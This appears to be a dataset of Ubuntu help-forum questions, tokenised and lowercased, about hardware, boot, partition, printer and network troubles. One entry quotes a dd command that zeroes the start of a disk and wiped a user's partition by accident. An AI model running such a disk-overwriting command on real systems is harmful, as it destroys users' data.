389978	touchpad cursor jumps while moving windows	i have the new dell inspiron 5000 with the haswell chipset . this laptop comes with a multi touchpad and a touch screen . i booted up a live cd of ubuntu to see how everything worked and everything was fine until i tried to move a window . i do n't like tap to click so i disable that . however when i try and drag a window it treats both fingers as independent inputs both trying to reposition the window . i.e . the finger i clicked the lower left corner of the touchpad with and the one im tryng to drag the window with both move the window . this causes the window to jump all over the screen . can anyone advise how to prevent this from happening . im trying to run 13.10 thanks . lookin on arch wiki about synaptics the section on clickpads describes what is happening is mtrack still the way to help resolve this . https : //wiki.archlinux.org/index.php/touchpad_synaptics # buttonless_touchpads_.28aka_clickpads.29
389979	looking to leave xp sp3 ie8 for ubuntu	i am a newbie , so i do n't know what results i if any i will get . i have been checking out ubuntu 9 or some number like that on a flash drive , and it seems like open source software and ubuntu is the way to go . a tablet looks like the place i would like to jump in . you know , new os , new device , new day ... it 's a new wave , so what should i try ? should i go ahead and buy a low-priced tablet and what specs do i look for ? should get a quad core with the most gigabytes ? maybe an iview 7-inch android multi-touch tablet or something from china ? i think that going for a lower end brand tablet and not spending a lot is worth trying until the learning curve tells me it 's time for something else .
389983	hdd downsize after installing ubuntu	here is the big deal guys i was using windows with two partitions `` c : '' and `` d : '' . after installing ubuntu `` d : '' partition is gone but totally gone -.- there was 500gb before installing ubuntu but i have just 298 gb hdd space so what can i do guys :
389984	my touchpad stops working when my computer 's memory is full	sometimes my computer runs out of memory ( or overwise bugs somehow for a few seconds ) , and after that touchpad stops reacting to anything . is there any way to get it back to life without reloading ?
389985	how to make a shortcut for the command kerio-kvc start , stop and restart commands ?	every time i want t use this software i have to type /etc/init.d/kerio-kvc { start|stop|restart } in terminal . how can i define a shortcut command in terminal to do that ?
389987	intermediate fan speed i8k	on i8kfan you have just two options of fan speed . what i want is to know if there 's a way to set a intermediate ( or more than one ) fan speed because the high value ( 2 ) is too noisy and the low value ( 1 ) let my system heat too much when watching videos or gaming . any help is appreciated .
389993	ubuntu efi boot partition and windows 8.1	i installed on my laptop windows 8.1 without secureboot . after that i installed ubuntu 13.10 and created partion /boot/efi and now laptop starts only ubuntu . how can i change grub settings to choose what os will be started ubuntu or windows ?
389996	13.10 black desktop , wo n't show wallpaper , i will not run nautilus	in 13.04 , i was able to set the wallpaper with : gsettings set org.gnome.desktop.background picture-uri file : ///path/to/pic.jpg i do not run nautilus and will not run nautilus on the desktop . i would like to know how to get back the ability to set the wallpaper again . there have been several questions that seem to be asking similar questions . i have tried : gsettings set org.gnome.settings-daemon.plugins.background active true and this does n't work . what other `` gsettings '' do i need to make this work . thanks ,
389997	/dev/sda is not an option when installing on new laptop	i am trying to install ubuntu 13.10 onto a laptop that i just purchased , but when i get the point of partitioning the disk , the only disk that shows up as an option is the flash drive that has the ubuntu iso ( /dev/sdc ) . the hard drive ( which i expect to be /dev/sda ) does n't appear ! can anyone tell me how to troubleshoot ? more detail : when given the option to designate partitions , the select box at the bottom actually said /dev/sda initially , but the map of partitions above it was for /dev/sdc . changing the value of the select box made/dev/sda disappear . on another attempt , opening the select box but clicking sda instead of sdc resulted in no change .
389998	wifi card not working on dell latitude d430	i installed ubuntu 12.04 on my dell latitude d430 . most things work fine , but my wireless is n't recognized . my wirelesscard is a combi with bleutooth . how can i solve this ?
390000	how to uninstall kubuntu plasma desktop/netbook system installed with ubuntu 12.04 lts unity	i installed kde on unity a few days ago to try . decided to use only unity after so i uninstalled it with ubuntu software center . the problem is that i still have the startup and shutdown screens from kde , and the grub display still has it 's kde colours . i can even access kde normally , like before . the uninstallation did n't change a thing . i tried using the command advised here http : //www.psychocats.net/ubuntu/pureubuntu that was given in a similar answer on this site and i get this : lecture des listes de paquets ... fait construction de l'arbre des dépendances lecture des informations d'état ... fait les paquets virtuels comme « kde-config-gtk-style » ne peuvent pas être supprimés e : impossible de trouver le paquet akonadi-facebook e : impossible de trouver le paquet audiocd-kio e : impossible de trouver le paquet colord-kde e : impossible de trouver le paquet kde-base-artwork e : impossible de trouver le paquet kde-telepathy-minimal e : impossible de trouver le paquet kdegames-data e : impossible de trouver le paquet libaudiocdplugins4 e : impossible de trouver le paquet libkcompactdisc4 e : impossible de trouver le paquet libkdcraw21 e : impossible de trouver le paquet libkdecorations4abi1 e : impossible de trouver le paquet libkdegames6 e : impossible de trouver le paquet libkexiv2-11 e : impossible de trouver le paquet libkipi9 e : impossible de trouver le paquet libktorrent4 e : impossible de trouver le paquet libktpchat0 e : impossible de trouver le paquet libktpcommoninternalsprivate3 e : impossible de trouver le paquet libkwineffects1abi4 e : impossible de trouver le paquet libkwinglutils1abi1 e : impossible de trouver le paquet libkworkspace4abi2 e : impossible de trouver le paquet liblastfm1 e : impossible de trouver le paquet libmailimporter4 e : impossible de trouver le paquet libopenconnect2 e : impossible de trouver le paquet libpoppler-qt4-4 e : impossible de trouver le paquet libqalculate5-data e : impossible de trouver le paquet libtelepathy-logger-qt4-1 e : impossible de trouver le paquet plasma-widget-telepathy-chat e : impossible de trouver le paquet print-manager e : impossible de trouver le paquet python3-pykde4 e : impossible de trouver le paquet ubuntu-release-upgrader-qt which in english basically means that packages like kde-config-gtk-style ca n't be deleted , and beside the list of packages underneath it 's said that they ca n't be found . i 've searched for hours and did n't find anything . i 'd just like to go back exactly to how it was before i installed kde . thanks ! p.s . it probably dose n't change anything but i have windows vista on dual boot
390001	how do i send personalized notify-send about custom events ?	watch netstat -n -a inet + notify-send `` attention new connection '' or watch cat /proc/net/ip_conntrack + notify-send `` attention new connection '' or watch ss -n + notify-send `` attention new connection '' do you have any idea how to connect this halves and thank you .
390002	any good app to manage the blocking of websites ?	i 'm currently setting up 12.04 for a windows convert-friend of mine . he has a problem with porn movies and has been trying to manage this problem . he 's asked me to block his favourite porn sites to help with his addiction . are there any available apps to manage the blocking/unblocking of certain websites ?
390003	how to downgrade gnome shell 3.5 to 3.4	question is simple . i noticed that there are almost no extensions for gnome 3.5 . what to do ?
390008	epson xp-215 not recognized by ubuntu 12.04	i recently bought a new printer epson xp-215 . i did a little research before buying it , to be certain that it was linux compatible . i found the drivers on the manufacturers webpage and downloaded them . i was able to install the deb package ( epson-inkjet-printer-escpr_1.3.0-1lsb3.2_amd64.deb ) and installed the printer ( via dash -- > printing ) and it is showing up in the list as `` installed '' . then i connected the printer via usb to my ubuntu 12.04 desktop . ~ $ uname -a linux comutername 3.5.0-44-generic # 67~precise1-ubuntu smp wed nov 13 16:16:57 utc 2013 x86_64 x86_64 x86_64 gnu/linux already tried : i 'm certain that the usb port that i 'm using is working , because it recognizes other devices instantly . i 'm certain that my printer is powered on ! the printer is working , because i can print network status reports and use it to copy documents . when i try lsusb it does n't show up in the list : ~ $ lsusb bus 001 device 004 : id 0424:2228 standard microsystems corp. 9-in-2 card reader bus 003 device 002 : id 04f2:0403 chicony electronics co. , ltd ku-0420 keyboard bus 003 device 003 : id 0461:4dfb primax electronics , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub then i took a look in dmesg , where i can only find my mouse and keyboard ( like with lsusb ) : ~ $ dmesg | grep usb [ 0.233562 ] acpi : bus type usb registered [ 0.233583 ] usbcore : registered new interface driver usbfs [ 0.233593 ] usbcore : registered new interface driver hub [ 0.233619 ] usbcore : registered new device driver usb [ 1.684044 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.684046 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.684049 ] usb usb1 : product : ehci host controller [ 1.684051 ] usb usb1 : manufacturer : linux 3.5.0-44-generic ehci_hcd [ 1.684053 ] usb usb1 : serialnumber : 0000:00:13.5 [ 1.744022 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.744024 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.744027 ] usb usb2 : product : ohci host controller [ 1.744029 ] usb usb2 : manufacturer : linux 3.5.0-44-generic ohci_hcd [ 1.744032 ] usb usb2 : serialnumber : 0000:00:13.0 [ 1.804018 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.804021 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.804023 ] usb usb3 : product : ohci host controller [ 1.804025 ] usb usb3 : manufacturer : linux 3.5.0-44-generic ohci_hcd [ 1.804027 ] usb usb3 : serialnumber : 0000:00:13.1 [ 1.864018 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.864021 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.864023 ] usb usb4 : product : ohci host controller [ 1.864025 ] usb usb4 : manufacturer : linux 3.5.0-44-generic ohci_hcd [ 1.864027 ] usb usb4 : serialnumber : 0000:00:13.2 [ 1.924017 ] usb usb5 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.924020 ] usb usb5 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.924022 ] usb usb5 : product : ohci host controller [ 1.924024 ] usb usb5 : manufacturer : linux 3.5.0-44-generic ohci_hcd [ 1.924027 ] usb usb5 : serialnumber : 0000:00:13.3 [ 1.984018 ] usb usb6 : new usb device found , idvendor=1d6b , idproduct=0001 [ 1.984020 ] usb usb6 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.984023 ] usb usb6 : product : ohci host controller [ 1.984025 ] usb usb6 : manufacturer : linux 3.5.0-44-generic ohci_hcd [ 1.984028 ] usb usb6 : serialnumber : 0000:00:13.4 [ 1.984267 ] usbcore : registered new interface driver libusual [ 2.108105 ] usb 1-8 : new high-speed usb device number 4 using ehci_hcd [ 2.326234 ] usb 1-8 : new usb device found , idvendor=0424 , idproduct=2228 [ 2.326237 ] usb 1-8 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 2.326239 ] usb 1-8 : product : flash card reader [ 2.326241 ] usb 1-8 : manufacturer : generic [ 2.326243 ] usb 1-8 : serialnumber : 000022272228 [ 2.328538 ] scsi6 : usb-storage 1-8:1.0 [ 2.328617 ] usbcore : registered new interface driver usb-storage [ 2.716020 ] usb 3-1 : new low-speed usb device number 2 using ohci_hcd [ 2.898055 ] usb 3-1 : new usb device found , idvendor=04f2 , idproduct=0403 [ 2.898059 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 2.898061 ] usb 3-1 : product : usb keyboard [ 2.898063 ] usb 3-1 : manufacturer : chicony [ 2.954155 ] usbcore : registered new interface driver usbhid [ 2.954159 ] usbhid : usb hid core driver [ 2.956856 ] input : chicony usb keyboard as /devices/pci0000:00/0000:00:13.1/usb3/3-1/3-1:1.0/input/input2 [ 2.956996 ] hid-generic 0003:04f2:0403.0001 : input , hidraw0 : usb hid v1.11 keyboard [ chicony usb keyboard ] on usb-0000:00:13.1-1/input0 [ 2.964124 ] input : chicony usb keyboard as /devices/pci0000:00/0000:00:13.1/usb3/3-1/3-1:1.1/input/input3 [ 2.964258 ] hid-generic 0003:04f2:0403.0002 : input , hiddev0 , hidraw1 : usb hid v1.11 device [ chicony usb keyboard ] on usb-0000:00:13.1-1/input1 [ 3.164024 ] usb 3-2 : new low-speed usb device number 3 using ohci_hcd [ 3.329056 ] usb 3-2 : new usb device found , idvendor=0461 , idproduct=4dfb [ 3.329061 ] usb 3-2 : new usb device strings : mfr=0 , product=2 , serialnumber=0 [ 3.329064 ] usb 3-2 : product : usb optical mouse [ 3.336378 ] input : usb optical mouse as /devices/pci0000:00/0000:00:13.1/usb3/3-2/3-2:1.0/input/input4 [ 3.336490 ] hid-generic 0003:0461:4dfb.0003 : input , hidraw2 : usb hid v1.11 mouse [ usb optical mouse ] on usb-0000:00:13.1-2/input0 anyone got any ideas ?
390010	if i manually compile php , should i uninstall it in dpkg first ?	around 2 years ago i attempted my first php compile and succedded . i occasionaly upgrade my compile script as i add modules and new versions come out . however , i 'm finding that apt-get unattended upgrades keep overwriting my php installation periodically . the last happened last night and downgraded my installation from 5.5.1 to 5.3.10 it happens very infrequently , but still brings the server down before i realise what has happened . i ran dpkg -l and can see even when i have my 5.5.1 setup , the dpkg version still reads 5.3.10 . i presume this is because i have done my own compile of php5 . should i : uninstall php from apt-get and block it 's install in future install my custom compiled version differently so dpkg recognises it ? just go ahead and block dpkg from allowing php updates . as yet undetermined 4th options ? your help is appreciated .
390011	how do i download a file using svn+ssh link ?	i am trying to download the file from the link list svn+ssh : //svn @ myhost.com/myfile . i have setup private key on my pc , and public key is on the remote server.when i execute the above link command i can see the files on the server like file1/ , file2/ , etc . what do i need to execute to get the server files on my pc ?
390015	why do i have to name my text file < something > .cpp in order to compile a c++ program from command line ?	i 'm exploring compiling/running simple c++ programs from the bash shell ( in ubuntu 12.04 ) . being new to linux in general , i actually have a couple questions . first , it seems that ubuntu/linux does not display file types in the .abc format , as windows does . i get that the os does n't need that extension to know the file 's type , but is n't it more convenient for the human user to be able to read off that information at a glance ? how am i supposed to know what type a given file is ? second ( and relatedly ) , if linux seems not to care about extending a file name with the type information , why is that when i create a simple c++ program in gedit and just call it 'test ' , the compilation does n't work ( using the g++ compiler btw ) , but when i name the file 'test.cpp ' , it does work ? does linux need/care about the extension , or not ? i feel like i 'm getting mixed messages here , and i would really like to understand .
390017	ca n't mount shared folder in ubuntu 12.10 server guest virtual box	i have filled out the shared folder options in settings - > shared folders of a shared folder with a name of 'share ' . it is set to automount but when i start up the guest os , nothing is showing up in the /media folder . i run the following command sudo mount -t vboxsf share /home/mo/local/ it gives me the error /sbin/mount.vboxsf : mount failed with the error : no such device what gives ?
390020	is a bad nfs mount preventing a clean boot ?	i 'm on ubuntu server and i basically ran into this problem here http : //serverfault.com/questions/56588/unmount-a-nfs-mount-where-the-nfs-server-has-disappeared the umount command did n't work , so i tried to just use the ol ' reboot . now the machine gets an error when booting : fs-cache : netfs 'nfs ' registered for caching < two minutes later > init : udevtrigger post-stop process ( 345 ) terminated with status 1 i tried booting in recovery mode so i could just comment out the bad nfs mount in my /etc/fstab file , but i was n't able to write the changes . i basically just want to get the machine booting properly again so that i can erase the bad mount point , either order is fine . what are my options here ?
390021	installer detects more operating systems than i actually run	i 've recently aqcuired a new laptop , a hp elitebook 8570w . it has windows 7 home premium x64 installed on it . i want to dual-boot windows and ubuntu . i had an old 10.04 installation cd from a friend , but that installer could n't find my current os , which i thought weird . i googled this and found many with similar problems , but no answer which seemed to work for me . thinking it just might be out dated i downloaded 12.04 and 13.10 , and now both installers gave back an entirely different message . it now tells me i have multiple os installed . seems like a step forward , but it still does n't give me the option to just install as dual-boot . so i selected 'something else ' , and i got this window : as you can see , /dev/sda2 has an 'unknown ' amount of data used , and if you look in the dropdown box option , you 'll notice it says '/dev/sda3 windows vista ( loader ) ' . i have however never installed windows vista on this machine , and if it is installed it 's hidden quite well as i ca n't find it . would it be safe to install over the vista loader partition ? if not , what are my options to get this dual-boot up and running ? i 'm not ( yet ) very used to linux , nor am i world 's most tech savvy guy , so please keep any explanation and ideas slightly in laymans terms . thank you !
390028	canon mg2120 and ubuntu 13.04 wo n't print black	i recently upgraded from 12.04 to 13.10 and the only issue i 've really had is with my printer . it 's a canon mg2120 and it was working fine with drivers i downloaded when i was on 12.04 . 13.04 automatically installed drivers for both scanning and printing , but for some reason it does n't print correctly . it seems to print like it 's running out of ink with colors fading and there is absolutely no black . i know the ink is n't out , because if i print to it from my other computer which is still 12.04 it prints 100 % correctly , black and all . i tried installing the drivers i used in 12.04 but they wo n't install on 13.10 . i 'm not sure how to go about fixing this .
390031	compilation error in geany	recently , i installed geany ide and wrote a few lines of code { hello.cpp } to print `` hello world '' using c++ . while compiling , it gave the following error message : compilation failed /bin/sh : 1 : g++ : not found same message appeared when i tried html code also . need help to solve the problem .
390034	how to recover ubuntu with grub ?	i have installed ubuntu 12.04 on a windows 7 laptop . i have had some problems with an sd card reader in my laptop and my troubles began after that . on reboot my ubuntu got hung on the purple screen before the login . i booted back in windows and it recommended . i run chkdsk as if windows had sensed something was wrong somwhere . i let it run and it deleted some faulty records . then i tried to reboot into ubuntu but now i get stuck in a screen called gnu grub . could someone please tell me if i can recover from here on ? i found a scenario on the web telling me how to search in grub for /vmluniz and /sbin/init and to use the linux , initrd and boot commands , but the search did not find anything . what should i do next ? thank goodness , i still have windows going . i could re-install ubuntu but i probably would loose all my data , as it wants me to uninstall the old installation . is this correct ? ps1 : i know nothing of grub so if i could get precise instructions , it would be very much appreciated . ps2 : when i boot i still see both windows and ubuntu in the boot menu . it appears my `` embedded '' ubuntu installation is damaged beyond repair . i have to start all over . this time i 'll create a separate partition for ubuntu . thanks .
390036	what happens to cron jobs when the system is down ?	as the title suggests : what happens to con jobs scheduled for a time when the system is down for any reasons as server maintenance or whatever ? if it is simply not executed : is there a way to manually execute all ( or better : all missed ) cron jobs at once ?
390039	touchpad not working in ubuntu 13.10	after upgrading to ubuntu 13.10 from 13.04 , my touchpad no longer responds . it does n't even show up in the system options . any ideas ? i 'm on a toshiba satellite c855d-s5315 .
390046	monitor gets `` no signal '' no matter what i do	i just got a new monitor ( acer h236hl ) . it works with the computer i 'm using now but it is n't working with my personal computer ( ubuntu 13.10 ) i turned my computer off , unplugged the old monitor ( take note that the monitor was working prior to shutting off my computer ) and put in my new acer one via hdmi . i booted my computer and turned on my monitor . my monitor searches for which connection ( hdmi/dvi/vga ) is being used . it does n't use any of them and says `` no signal '' and then goes into sleep mode . if i turn the monitor on when not connected to my computer it says `` cable not connected '' . i try vga and dvi and the same thing . i try to put my old monitor back in and it would n't work either ( it worked perfectly earlier ) and it just says `` no signal '' . i assumed this would be an easy plug and play but i guess not .
390048	need help partitioning/fixing my hard drive to install ubuntu from live usb	i am currently running ubuntu from a live usb . my hdd /dev/sda shows 3 partitions in gparted . unknown filesystem , extended and linux-swap . i am trying to make the unknown filesystem to ext4 but the operation fails at writing superblocks and filesystem accounting information : 6/235 any ideas how to proceed ? be gentle , i 'm new to linux : ) p.s when i try to install ubuntu from the live usb i get an error input/output error at /dev/sda
390049	ubuntu does not create a new folder	hello all ubuntu community i have small problem when i am now using code blocks try to save a file there is an option that you can create a new folder then save in the new folder after you name the new folder . used to save in new folder that way but it does n't work any more ! any ideas . i thought it might be this is happening with code blocks . i tried the same saving a file and creating anew folder using a different program libre office writer also it did n't work
390051	ca n't find wireless for intel corporation 7260 on ubuntu 12.04 lts ( 3.2.0.57 )	i followed the post- no wireless for intel corporation 7260 version 63 but when i run the following command- make defconfig-iwlwifi ( executes fine ) make i get the an error saying `` * no rule to make target 'card ' . '' i executed the steps specified on the post on kernel version 3.2.0.29 perfectly , and it worked like a beauty , but once i updated the kernel version to 3.2.0.57 the wifi was n't available , so i went back to recompile `` backport '' again as suggested . but this time i got the above error . ( machine is lenevo l540 )
390053	change the style of specific programs in xubuntu 12.04	is it possible to change the style of a specific program while using another style for the entire desktop in xubuntu 12.04 ? for example , i would like to use the xfce-dusk style for the entire desktop and most programs , but i would like to use something like greybird for qgit , meld , and my text editor . is this possible , and if so , how ?
390056	13.10 lock screen does not display correctly on wake-up	i currently am running 13.10 sometimes when i go to wake the system up after the screen has locked the screen will not fully go back to where it asks me for a password . what happens is the screen displays the desktop background ( like the lock screen would normally show ) but only for a fraction of a second with each key stroke . it also flickers with mouse movements . i have posted a video on google+ . it will not , however , let me enter my password and unlock the system . the only way to resolve the issue is to do a hard reset and reboot the system . i am running an amd 6 core processor with 8 gigs of ram , an nvidia card with dual monitors . has anyone seen a similar issue ? thanks in advance jonathan
390057	how to fix netbeans 7.4 ( and netbeans 8.0 ) ugly text and popups in ubuntu 13.10 ?	i 've tried various workarounds , but i have n't yet found a way to make the fonts in netbeans look right . i 've tried changing the config files of netbeans , and trying the instructions here that do n't seem to have any effect since they are n't installed in 13.10 . my specific question has three parts : 1 ) why is every font 18 or less drawing characters with lines that are only one pixel thick , and the . and : are making only one pixel on the screen - unless i force bold , or a huge font of 19 or more : ( if this is a java problem , why is eclipse fine ? ) bad font , thin and not easily readable almost okay font - but huge : if you look at the terminal or native ubuntu apps they do n't show up as only one pixel - is there a solution for this ? 2 ) why does netbeans show a box at the end of the line , when text is too long and overflows to the next displayed line ? 3 ) maybe not related , but why do popup-windows of netbeans have this small dropdown below them ? this happens both with the netbeans-starting info window , and the git changes popouts from the bar with the line-numbers . ugly git integration showing changes : update no change in 8.0 , unfortunately : (
390059	why does n't my hp deskjet 2514 work ?	i 'm new to ubuntu ( using version 12.04 lts ) , so maybe there 's something obvious i 'm missing . i hope that 's the case . i 'm on my second printer , and keep having the same problem . i 'm currently using an hp deskjet 2514 . the system recognizes the printer and attempts to use a driver for hp series 2500 . when i try to print a test page , though , i get to `` idle - rendering completed '' and the page never prints . from what i can tell , i 've got hplip installed , but i do n't know if there 's something i need to do that i 'm not doing . from what i 've read , it seems that the 2514 should be supported , but it 's not working . incidentally , my first try was with a canon pixma mg2520 , and it did exactly the same thing .
390060	can not boot 12.04 `` could not write bytes : broken pipe ''	on boot , my computer came to a black screen with the single line : could not write bytes : broken pipe i used a live-boot to run boot-repair , and got this log : http : //paste.ubuntu.com/6564507/ how would i go about fixing this ?
390061	configure dual nics for gateway machine	i have a box i 'm configuring to be a gateway . i have eth0 internal ip and eth1 the internet external ip . however , the issue right now is that i want to configure and test the machine before i deploy it . with only my internal nic connected i can not access the internet .
390062	why does n't jslint/jshint work in ubuntu ?	i installed as described here and other places , but after using npm to install jslint , jshint , neither will work . running `` jslint '' , i only get : /usr/bin/env : node : no such file or directory is there something wrong with the ubuntu 13.10 repo , or do i have to set up some path variable myself ?
390065	switching back to or allocating the memory back to windows 7	i have a windows 7 laptop , toshiba satellite , and about a month ago i installed ubuntu 13.04 , but rather than completely switching i just used up about half of my hard drive for both , so i had about 250 gb for both windows 7 and ubuntu . from this i used ubuntu awhile and i still love it , the only thing is that i do n't use it much anymore so i wanted to put more memory back onto windows 7 , at the least .
390068	create new user and assign it 's only access to /home/	we 're on ubuntu server 12.04 i would like to create multiple users and assign them to a few directories that are already made . example : mcadmin : /home/* mcadmin2 : /home/dir1/* mcadmin3 : /home/dir2/* however , so far i only figured out how to create a user and create their own directory , i need to assign them to already made directories though . how can i do this ?
390072	how to display files and applications activity ?	i would like to display the activity recorded by zeitgeist on my ubuntu system .
390075	hp 6710b want play dvds or burn cds	i have a old hp 6710b with 2gb of ram and 250gb harddrive the problem iam having is that it want play back dvds or burn cds can anyone help me with this thanks
390079	which wifi adaptor should i get ?	my post is quite lengthy , but i wanted to show that this was n't just another one of those `` what do you recommend '' questions . i 'm currently building a media server for my ageing parents . i want everything to be as simple as possible , as well as wrinkle-free . everything is set up quite nicely . i have plex media server installed on the ubuntu machine . that streams to a roku that 's connected to their tv . the only problem is network connectivity . i had an old wifi dongle lying around ( ralink rt5370 , for those of you who remember ) , but it 's so unbearably slow that streaming an hd movie to the tv is pretty much out of the question . i 'm looking for a 300mbps wifi usb dongle , or pci card . either would work . all i want is for the chipset to be supported out-of-the-box on ubuntu . i wo n't always be around , so whenever a system update gets installed , i do n't want to have to recompile some obscure drivers for the server 's wifi to work . ndiswrapper is also out of the question , as i have tested it and have found it to be quite unstable , especially when streaming large files over large periods of time . i need something that has mainstream , integrated kernel support . i looked on the usual pages in the ubuntu docs , as well as various forum posts and a number of web sites , but after roughly four hours of research ( kill me now ) , the only thing i 'm sure of is that linux has always had trouble with supporting wifi cards , and while less bad today , the problem is still somewhat present . can anybody recommend a stable , no-hack-necessary wifi card or dongle that will work out-of-the-box with ubuntu 13.10 ? thank you very much for your time !
390080	ubuntu installation errors	ok , so basically i have build a new gaming pc myself . some basic info 8 core 3.5 ghz amd processor 8gigs of ram geforce 650 ti boost while i save up for windows 7 os , i decided to install ubuntu . 13.10 . i first configured the bios to my liking ( mostly fan , performance , etc stuff ) i set a master password for the boot , so when you log on it asks for a password . i then installed ubuntu . i encrypted the hard drive and my home folder , put maximum security options etc . then it says to restart like normal this is where the problems begin . i restart . enter the boot mater password . then it takes me to a screen asking for a passphrase to unlock the drive . i try to enter the password , but no characters show up . i look this up and find that it is a security feature . so i enter my password , then hit enter . nothing happens . i restart and try again many times to no avail . i wonder if i created an error in my pass word . so i attempt to reinstall ubuntu , i do . at the end of installation , i hit restart and then the computer just does nothing for several minutes , i then shut it off and turn it back on . it then asks me for the master boot password , i enter it . then the grub menu appears , but different . it shows ubuntu , advanced ubuntu options , and system setup . i hit ubuntu . then again i can not unlock my drive . i then decide i will reinstall again , and remove this security feature . but when i try to it does not run the disk , or acknowledge it in the grub menu . i try to override it by restarting in the bios , but it will not load , even when holding/pressing repeatedly the said keys . no matter what i do , grub menu shows up ( after enter the master boot password every time ) . i hit the system setup option this just restarts my computer . i am just left with a big steel block right now , what can i do ?
390081	after restoring partition with testdisk , need to restore mbr	i accidentally trashed my partition while trying to wipe a usb flash drive . here is the command that i ran : sudo dd if=/dev/zero of=/dev/sdb bs=1m count=1 after that disaster , my computer would not boot when i restarted . i booted to a livecd , installed testdisk , and restored my partition successfully . but , upon rebooting , i come to a prompt that repeatedly says 1234f . i went back into the livecd and tried to repair my mbr using boot-repair , but boot repair seems to not have any effect when i run the mbr restore option . here is the log file from when i ran it : http : //paste.ubuntu.com/6564827/ how to fix this ?
390082	why if my system is 64-bit , i ca n't install ubuntu 64-bit in virtual box ?	i 'm on windows 7 64 bit , intel core i7 3612qm , nvidia geforce gt640m 2gb , 8gb ram , 240gb ssd and 500gb hdd . i want to delete and get rid of windows 7 partition and install ubuntu 13.10 on my 240gb ssd . i tried installing ubuntu 13.10 64 bit on virtualbox but i get this error : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . i have checked my cpu details here : intel core i7 3612qm if you scroll a bit to that site , you can see there : 64 bit - 64 bit support i want to install ubuntu 64 bit , but is my computer compatible with it ?
390083	update error ( problem with mergelist )	during the another common update on my xfce 4.8 the following error occurred : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ca.archive.ubuntu.com_ubuntu_dists_precise-updates_universe_binary-amd64_packages e : the package lists or status file could not be parsed or opened . this usually means that your installed packages have unmet dependencies . '' i tried to fix it by running : sudo apt-get -u dist-upgrade and sudo apt-get -o debug : :okgproblemresolver=yes dist-upgrade , but it throws the same errors . thank you for your help !
390086	does ubuntu need install drivers for footmatic printers separately ?	does ubuntu need install drivers for footmatic printers separately ? or is installed in ubuntu installation ? does printer drivers meta package contains these drivers ? how to find a printer is footmatic or not ?
390087	set a screensaver as wallpaper in unity ?	is this possible on ubuntu desktop 12.04 ? specifically , i would like to run xscreensaver as the unity desktop wallpaper .
390092	error while loading shared libraries : libqtgui.so.4 when starting opera mobile emulator	apparently the opera mobile emulator is a 32-bit program and ubuntu 13.10 no longer contains the `` a32-libs '' package to provide this support . i have downloaded and unzipped the files , but when i try to run the emulator i get the following error message : ./opera-mobile-emulator-launcher : error while loading shared libraries : libqtgui.so.4 : can not open shared object file : no such file or directory i have searched all over and have found all sorts of package-lists that one should install in order to run 32-bit programs on 13.10 . i have tried several , but they have all failed because it seems that the list of packages that you need to run a specific program is specific to that program . does anyone know how i can get this to work ?
390093	setting up a user account for a web server	i 'm pretty new to ubuntu/linux . i 'm setting up a lighttpd webserver and i think i need to set up a webserver/daemon user account to get it going . the config file is asking for server.username and server.groupname . i think i need to set up a user account using adduser that the server will use . i 'm also assuming i need to set up the account as a system user as opposed to a normal user . is that right ? also from what i 've read i can set the home directory to /var/www/ which is where i plan to keep all of my website files and should give the lighttpd user the proper permissions . do i need to set up a group as well as an account or will creating the account automatically create a group with the same name ? do i give the account a password ? should i manually assign the uid ? is this the proper way to set it up ? any help would be appreciated .
390100	remote access - ssh listening port filtered out by firewall ?	i am trying to access a remote server , with no physical access . i have accidentally changed the previous listening port in ssh and forgot to change it in the firewall rules . in firewall 15000 is enabled , but ssh configuration listens on another port 20000 . every solutions in the net seems to need physical access . is there a way to channel my ssh connections at port 15000 to 20000 ?
390101	ca n't boot after install on n56dp . i get `` ubuntu is running in low graphics mode ''	i have searched the already posted questions here and none of them have solutions that help me . i have a asus n56dp-dhll , which has an amd a10 apu . when i boot from the usb , all is perfectly fine , wifi and sound work , graphics work perfectly fine and my monitors native resolution and i can fully install ubuntu 13.10 . but when i reboot i get : '' ubuntu is running in low graphics mode '' i have tried click ok and the options it shows next , which are : '' run in low graphics mode for this one session , reconfigure graphics , troubleshoot error and exit to console , '' do absolutely nothing , expect for exit to console . i have tried everything but nothing seems to work . i tried to install the latest catalyst 13.4 , which i was successfully in doing , but it still did n't work . i installed the dependences for fglrx and i did : sudo aticonfig -- initial -f any idea as to what on earth i can do to fix this ?
390102	ubuntu 12.04 boots to a blank screen	when i turn on the power button , the monitor gets no signal . so , i try until i can see the boot . then out of range is shown on the screen . i have researched a bit . so , i click the right corner of the screen , navigate to below and click . this results in the grub menu , with file check , reboot , etc . as options.then i reboot . i have been operating this way for two weeks . it started to hang in the middle of operations recently . so i installed all the updates . since then , it started to go blank after login and the screen shows no signal when i turn the power button on again . please help me out . i have only ubuntu 12.04 as the os . system info : ⠀• memory : 1.7gb ⠀• processor : amd athlon ( tm ) 7750 dual-core processor x 2 ⠀• graphics : geforce 7025 / nforce 630a/integrated/sse2/3dnow ! ⠀• os : ubuntu 12.04 32-bit ⠀• hard drive : 490.3gb how do i fix this issue ?
